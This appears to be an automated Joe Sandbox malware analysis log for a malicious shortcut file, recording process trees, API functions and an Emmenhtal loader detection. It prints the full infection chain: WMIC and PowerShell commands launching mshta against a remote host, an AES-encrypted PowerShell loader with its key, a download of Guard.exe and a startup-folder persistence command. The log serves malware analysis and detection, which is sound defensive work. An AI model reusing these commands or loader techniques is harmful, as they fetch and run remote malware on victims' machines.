Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A51B58D0	15_2_00007FF7A51B58D0
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A51CF8D0	15_2_00007FF7A51CF8D0
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A51D1750	15_2_00007FF7A51D1750
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A52517C0	15_2_00007FF7A52517C0
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A52332AC	15_2_00007FF7A52332AC
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A51E529C	15_2_00007FF7A51E529C
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A51AB390	15_2_00007FF7A51AB390
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A51ABE70	15_2_00007FF7A51ABE70
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A51CBEB4	15_2_00007FF7A51CBEB4
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A523206C	15_2_00007FF7A523206C
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A51A5F3C	15_2_00007FF7A51A5F3C
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A51BFA4F	15_2_00007FF7A51BFA4F
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A5221A18	15_2_00007FF7A5221A18
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A51D793C	15_2_00007FF7A51D793C
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A524BA0C	15_2_00007FF7A524BA0C
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A51AB9F0	15_2_00007FF7A51AB9F0
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A51B3C20	15_2_00007FF7A51B3C20
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A524DB18	15_2_00007FF7A524DB18
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_00007FF886D6091E	21_2_00007FF886D6091E
Source: C:\Users\Public\Guard.exe	Code function: 23_2_008FB020	23_2_008FB020
Source: C:\Users\Public\Guard.exe	Code function: 23_2_008F94E0	23_2_008F94E0
Source: C:\Users\Public\Guard.exe	Code function: 23_2_008F9C80	23_2_008F9C80
Source: C:\Users\Public\Guard.exe	Code function: 23_2_009123F5	23_2_009123F5
Source: C:\Users\Public\Guard.exe	Code function: 23_2_00978400	23_2_00978400
Source: C:\Users\Public\Guard.exe	Code function: 23_2_00926502	23_2_00926502
Source: C:\Users\Public\Guard.exe	Code function: 23_2_008FE6F0	23_2_008FE6F0
Source: C:\Users\Public\Guard.exe	Code function: 23_2_0092265E	23_2_0092265E
Source: C:\Users\Public\Guard.exe	Code function: 23_2_0091282A	23_2_0091282A
Source: C:\Users\Public\Guard.exe	Code function: 23_2_009289BF	23_2_009289BF
Source: C:\Users\Public\Guard.exe	Code function: 23_2_00970A3A	23_2_00970A3A
Source: C:\Users\Public\Guard.exe	Code function: 23_2_00926A74	23_2_00926A74
Source: C:\Users\Public\Guard.exe	Code function: 23_2_00900BE0	23_2_00900BE0
Source: C:\Users\Public\Guard.exe	Code function: 23_2_0094EDB2	23_2_0094EDB2
Source: C:\Users\Public\Guard.exe	Code function: 23_2_0091CD51	23_2_0091CD51
Source: C:\Users\Public\Guard.exe	Code function: 23_2_00970EB7	23_2_00970EB7
Source: C:\Users\Public\Guard.exe	Code function: 23_2_00958E44	23_2_00958E44
Source: C:\Users\Public\Guard.exe	Code function: 23_2_00926FE6	23_2_00926FE6
Source: C:\Users\Public\Guard.exe	Code function: 23_2_009133B7	23_2_009133B7
Source: C:\Users\Public\Guard.exe	Code function: 23_2_0091F409	23_2_0091F409
Source: C:\Users\Public\Guard.exe	Code function: 23_2_0090D45D	23_2_0090D45D
Source: C:\Users\Public\Guard.exe	Code function: 23_2_009116B4	23_2_009116B4
Source: C:\Users\Public\Guard.exe	Code function: 23_2_008FF6A0	23_2_008FF6A0
Source: C:\Users\Public\Guard.exe	Code function: 23_2_0090F628	23_2_0090F628
Source: C:\Users\Public\Guard.exe	Code function: 23_2_008F1663	23_2_008F1663
Source: C:\Users\Public\Guard.exe	Code function: 23_2_009178C3	23_2_009178C3
Source: C:\Users\Public\Guard.exe	Code function: 23_2_0091DBA5	23_2_0091DBA5
Source: C:\Users\Public\Guard.exe	Code function: 23_2_00911BA8	23_2_00911BA8
Source: C:\Users\Public\Guard.exe	Code function: 23_2_00929CE5	23_2_00929CE5
Source: C:\Users\Public\Guard.exe	Code function: 23_2_0090DD28	23_2_0090DD28
Source: C:\Users\Public\Guard.exe	Code function: 23_2_0091BFD6	23_2_0091BFD6
Source: C:\Users\Public\Guard.exe	Code function: 23_2_00911FC0	23_2_00911FC0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Code function: 27_2_0013B020	27_2_0013B020
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Code function: 27_2_001394E0	27_2_001394E0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Code function: 27_2_00139C80	27_2_00139C80
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Code function: 27_2_001523F5	27_2_001523F5
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Code function: 27_2_001B8400	27_2_001B8400
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Code function: 27_2_00166502	27_2_00166502
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Code function: 27_2_0016265E	27_2_0016265E
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Code function: 27_2_0013E6F0	27_2_0013E6F0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Code function: 27_2_0015282A	27_2_0015282A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Code function: 27_2_001689BF	27_2_001689BF
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Code function: 27_2_001B0A3A	27_2_001B0A3A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Code function: 27_2_00166A74	27_2_00166A74
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Code function: 27_2_00140BE0	27_2_00140BE0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Code function: 27_2_0015CD51	27_2_0015CD51
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Code function: 27_2_0018EDB2	27_2_0018EDB2
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Code function: 27_2_00198E44	27_2_00198E44
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Code function: 27_2_001B0EB7	27_2_001B0EB7
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Code function: 27_2_00166FE6	27_2_00166FE6
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Code function: 27_2_001533B7	27_2_001533B7
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Code function: 27_2_0015F409	27_2_0015F409
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Code function: 27_2_0014D45D	27_2_0014D45D
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Code function: 27_2_0014F628	27_2_0014F628
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Code function: 27_2_00131663	27_2_00131663
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Code function: 27_2_001516B4	27_2_001516B4
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Code function: 27_2_0013F6A0	27_2_0013F6A0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Code function: 27_2_001578C3	27_2_001578C3
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Code function: 27_2_0015DBA5	27_2_0015DBA5
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Code function: 27_2_00151BA8	27_2_00151BA8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Code function: 27_2_00169CE5	27_2_00169CE5
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Code function: 27_2_0014DD28	27_2_0014DD28
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Code function: 27_2_0015BFD6	27_2_0015BFD6
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Code function: 27_2_00151FC0	27_2_00151FC0

Source: Joe Sandbox View

Dropped File: C:\Users\Public\Guard.exe D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD

Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Code function: String function: 00158B30 appears 42 times
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Code function: String function: 00150D17 appears 70 times
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Code function: String function: 00141A36 appears 34 times
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: String function: 00007FF7A51C8D58 appears 76 times
Source: C:\Users\Public\Guard.exe	Code function: String function: 00910D17 appears 70 times
Source: C:\Users\Public\Guard.exe	Code function: String function: 00901A36 appears 34 times
Source: C:\Users\Public\Guard.exe	Code function: String function: 00918B30 appears 42 times

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: C:\Windows\System32\mshta.exe	Process created: Commandline size = 2588
Source: C:\Windows\System32\mshta.exe	Process created: Commandline size = 2588			Jump to behavior

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\Ghep2712[1], type: DROPPED

Matched rule: emmenhtal_strings_hta_exe author = Sekoia.io, description = Emmenhtal Loader string, creation_date = 2024-09-06, classification = TLP:CLEAR, version = 1.0, id = 64e08610-e8a4-4edd-8f6b-d4e8d2b47d87, hash = e86a22f1c73b85678e64341427c7193ba65903f3c0f29af2e65d7c56d833d912

Source: classification engine

Classification label: mal100.expl.evad.winLNK@43/73@5/2

Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe

Code function: 15_2_00007FF7A5223778 GetLastError,FormatMessageW,

15_2_00007FF7A5223778

Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A520CCE0 AdjustTokenPrivileges,CloseHandle,	15_2_00007FF7A520CCE0
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A520D5CC LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	15_2_00007FF7A520D5CC
Source: C:\Users\Public\Guard.exe	Code function: 23_2_00948DE9 AdjustTokenPrivileges,CloseHandle,	23_2_00948DE9
Source: C:\Users\Public\Guard.exe	Code function: 23_2_00949399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	23_2_00949399
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Code function: 27_2_00188DE9 AdjustTokenPrivileges,CloseHandle,	27_2_00188DE9
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Code function: 27_2_00189399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	27_2_00189399

Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe

Code function: 15_2_00007FF7A52258C4 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

15_2_00007FF7A52258C4

Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe

Code function: 15_2_00007FF7A523EB34 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

15_2_00007FF7A523EB34

Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe

Code function: 15_2_00007FF7A52366B4 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,

15_2_00007FF7A52366B4

Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe

Code function: 15_2_00007FF7A51A6580 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

15_2_00007FF7A51A6580

Source: C:\Windows\System32\mshta.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\Ghep2712[1]

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7960:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6168:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7564:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7496:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1816:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_brtejzka.3ji.ps1

Jump to behavior

Source: C:\Windows\System32\wbem\WMIC.exe

WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create

Source: C:\Windows\System32\conhost.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wbem\WMIC.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: tzA45NGAW4.lnk	Virustotal: Detection: 25%
Source: tzA45NGAW4.lnk	ReversingLabs: Detection: 18%

Source: unknown	Process created: C:\Windows\System32\wbem\WMIC.exe "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/Ghep2712')"
Source: C:\Windows\System32\wbem\WMIC.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wbem\WMIC.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/Ghep2712')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://tiffany-careers.com/Ghep2712"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://tiffany-careers.com/Ghep2712
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '9CF532B67986D916047FE0AC0764DA11DC4EADD5CE4C32A9EFBD866103824CD8010E51E35AA8431521E80FD6FD2B3D73241C0BB11F04EE49313A72FA43C65EE5DF342E50AAAB881EB97E2AD4046B96D04E64FD968C51007DBDB019561AAD993D9DDD6B0E95AAC81E269357C5BFEAEA2527E8A20F8FCEEE34F91F72675881E50DCD04295A790A9E13CE9CBF37B601B4FFAFE1D5CAC03DFDA56DCA95FF5424D15D2201EE63774AEF024E5D3441D0810D093A2A8E480D6D4B525FA6FC903E3BDB710FFAE3E893622CE5C8764591B00B8FC9C8100BDA923A83E6F8B88E69B0755D3228D1DC52C7C67BB3B24C6C30B777A5DDDC87AE8DF799E072F9A5A2E930038C7145315FA2576ADA033D15A7764469DE0BD65B7F9E89E55EA0317333FB845BB4339BA707D00A5B4FD12EF2BCA27548187BE559BD1E7662E4B6C54CE3999E1730EED4F58C611CC3B8C64086B0FF8A572FBC600798C70C4872E23D8DFEC08E57EC5BD8C46AD07560467116EEE5F8C78F0BB81E4E5B3A4C92473CAC6FC01E77EEA8F5860B14D885342EF00B915D9B9277B47DD62E92385866D4F08595B75FD3416076067E9C9C3A909D66C4807D3D34D802E94AFD77152A2E8719F1DB90EEEC5D5288DCDA7A440771A416DB8635C548C523B726DA123203E5BB32B7F0239E81E2E1C9948A2D9629655467B0C4210B5562746710458C26E13B06B0E5A0667F3D764E09D22E4F04DB3052359BDDB7C937C0FFC5E7B6BF7B398E140333E5B5B9741857518CBFC0A86CC2756344C085D6D9F6503AEF5967D61A95B8ED8B25A8DB23CFE55452E36DCEAB63EE4F1AA5BB09A1530D0D56F7123EA0E9278D6930295A53624251959B73A845ABD6AFC47B295DDF6B8083CD04B85C0789E0F09013BCBE631B9551A179D39DB7491A04A601C6E09CA8FF994D713877D75EA86A31FF9EC9B2C557BAE8C6A494EA46A84FC08A7DAC1B5ADDD84771E1AEFEEB3418328847AD5670D846972DBA8193DD696F0A22D11217E461ED7E46B33E2EF47F12B09657CB01CC3AE86335B6E69B306E63FDAC762CA62A91E39E7778E3A0CD5C1637FDF8E8F1AEAC86E8AA27EA3EBCD0BF91EFC1995D43D53A9537E8D0E5690CED64DD12BDF582DA4670F8EEC5BD3A43AC5AE823CFCDD2974718561BB5BE154E812A135FF700C05380B3B3283B4E089BA3450995E7D234293C2E6735402BE512FEF974C3031038C10F930900474FD65A4B2251379752BD260DCE20B2B16C34BB0B9B2D96015FEA98D2CA49F108194FF06C88A1B9C28318067753820430FCFFAE689D4A1AF2F1FA1E72325BC53D6460FFF8B5D895BAD7A4562A18E2129A5D836FCFF6CF002491AE00BA0D48891008E3FA63EE6F968719585482A9C78C05CD826A70C2500B84CD750008340587F705F63C221378C17C1FC4F620B61B035696056491071F78A3D4E95A1343424E7664744E454A61727570646663';function HUI ($CXfuOnjU){return -split ($CXfuOnjU -replace '..', '0x$& ')};$FMWRG = HUI($ddg.SubString(0, 2048));$oeC = [System.Security.Cryptography.Aes]::Create();$oeC.Key = HUI($ddg.SubString(2048));$oeC.IV = New-Object byte[] 16;$gVhTqzko = $oeC.CreateDecryptor();$JNWNnV = [System.String]::new($gVhTqzko.TransformFinalBlock($FMWRG, 0,$FMWRG.Length)); sal fd $JNWNnV.Substring(3,3); fd $JNWNnV.Substring(6)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Project_Information.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2056 --field-trial-handle=1580,i,9458825492255786744,15247656266253398828,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\qJXhXwR.exe "C:\Users\user\AppData\Roaming\qJXhXwR.exe"
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/kSMAbiand" -OutFile "C:\Users\Public\Guard.exe""
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\Public\Guard.exe "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
Source: C:\Users\Public\Guard.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://tiffany-careers.com/Ghep2712"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://tiffany-careers.com/Ghep2712	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '9CF532B67986D916047FE0AC0764DA11DC4EADD5CE4C32A9EFBD866103824CD8010E51E35AA8431521E80FD6FD2B3D73241C0BB11F04EE49313A72FA43C65EE5DF342E50AAAB881EB97E2AD4046B96D04E64FD968C51007DBDB019561AAD993D9DDD6B0E95AAC81E269357C5BFEAEA2527E8A20F8FCEEE34F91F72675881E50DCD04295A790A9E13CE9CBF37B601B4FFAFE1D5CAC03DFDA56DCA95FF5424D15D2201EE63774AEF024E5D3441D0810D093A2A8E480D6D4B525FA6FC903E3BDB710FFAE3E893622CE5C8764591B00B8FC9C8100BDA923A83E6F8B88E69B0755D3228D1DC52C7C67BB3B24C6C30B777A5DDDC87AE8DF799E072F9A5A2E930038C7145315FA2576ADA033D15A7764469DE0BD65B7F9E89E55EA0317333FB845BB4339BA707D00A5B4FD12EF2BCA27548187BE559BD1E7662E4B6C54CE3999E1730EED4F58C611CC3B8C64086B0FF8A572FBC600798C70C4872E23D8DFEC08E57EC5BD8C46AD07560467116EEE5F8C78F0BB81E4E5B3A4C92473CAC6FC01E77EEA8F5860B14D885342EF00B915D9B9277B47DD62E92385866D4F08595B75FD3416076067E9C9C3A909D66C4807D3D34D802E94AFD77152A2E8719F1DB90EEEC5D5288DCDA7A440771A416DB8635C548C523B726DA123203E5BB32B7F0239E81E2E1C9948A2D9629655467B0C4210B5562746710458C26E13B06B0E5A0667F3D764E09D22E4F04DB3052359BDDB7C937C0FFC5E7B6BF7B398E140333E5B5B9741857518CBFC0A86CC2756344C085D6D9F6503AEF5967D61A95B8ED8B25A8DB23CFE55452E36DCEAB63EE4F1AA5BB09A1530D0D56F7123EA0E9278D6930295A53624251959B73A845ABD6AFC47B295DDF6B8083CD04B85C0789E0F09013BCBE631B9551A179D39DB7491A04A601C6E09CA8FF994D713877D75EA86A31FF9EC9B2C557BAE8C6A494EA46A84FC08A7DAC1B5ADDD84771E1AEFEEB3418328847AD5670D846972DBA8193DD696F0A22D11217E461ED7E46B33E2EF47F12B09657CB01CC3AE86335B6E69B306E63FDAC762CA62A91E39E7778E3A0CD5C1637FDF8E8F1AEAC86E8AA27EA3EBCD0BF91EFC1995D43D53A9537E8D0E5690CED64DD12BDF582DA4670F8EEC5BD3A43AC5AE823CFCDD2974718561BB5BE154E812A135FF700C05380B3B3283B4E089BA3450995E7D234293C2E6735402BE512FEF974C3031038C10F930900474FD65A4B2251379752BD260DCE20B2B16C34BB0B9B2D96015FEA98D2CA49F108194FF06C88A1B9C28318067753820430FCFFAE689D4A1AF2F1FA1E72325BC53D6460FFF8B5D895BAD7A4562A18E2129A5D836FCFF6CF002491AE00BA0D48891008E3FA63EE6F968719585482A9C78C05CD826A70C2500B84CD750008340587F705F63C221378C17C1FC4F620B61B035696056491071F78A3D4E95A1343424E7664744E454A61727570646663';function HUI ($CXfuOnjU){return -split ($CXfuOnjU -replace '..', '0x$& ')};$FMWRG = HUI($ddg.SubString(0, 2048));$oeC = [System.Security.Cryptography.Aes]::Create();$oeC.Key = HUI($ddg.SubString(2048));$oeC.IV = New-Object byte[] 16;$gVhTqzko = $oeC.CreateDecryptor();$JNWNnV = [System.String]::new($gVhTqzko.TransformFinalBlock($FMWRG, 0,$FMWRG.Length)); sal fd $JNWNnV.Substring(3,3); fd $JNWNnV.Substring(6)	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Project_Information.pdf"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\qJXhXwR.exe "C:\Users\user\AppData\Roaming\qJXhXwR.exe"	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2056 --field-trial-handle=1580,i,9458825492255786744,15247656266253398828,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
